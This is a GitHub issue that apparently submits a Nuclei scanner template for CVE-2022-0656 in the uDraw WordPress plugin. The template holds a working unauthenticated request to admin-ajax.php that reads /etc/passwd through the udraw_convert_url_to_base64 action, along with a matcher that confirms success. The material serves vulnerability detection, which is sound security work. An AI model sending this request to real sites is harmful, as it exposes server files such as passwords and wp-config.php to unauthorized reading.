### ISSUE TITLE
uDraw < 3.3.3 - Unauthenticated Arbitrary File Access

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4799]
```yaml
id: CVE-2022-0656

info:
  name: uDraw < 3.3.3 - Unauthenticated Arbitrary File Access
  author: akincibor
  severity: critical
  description: The plugin does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).
  reference:
    - https://wpscan.com/vulnerability/925c4c28-ae94-4684-a365-5f1e34e6c151
  tags: wp,wordpress,rce,lfi,rfi,udraw

requests:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        User-Agent: Mozilla/5.0
        Connection: close

        action=udraw_convert_url_to_base64&url=/etc/passwd

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "cm9vd" # root in base64

      - type: status
        status:
          - 200
```
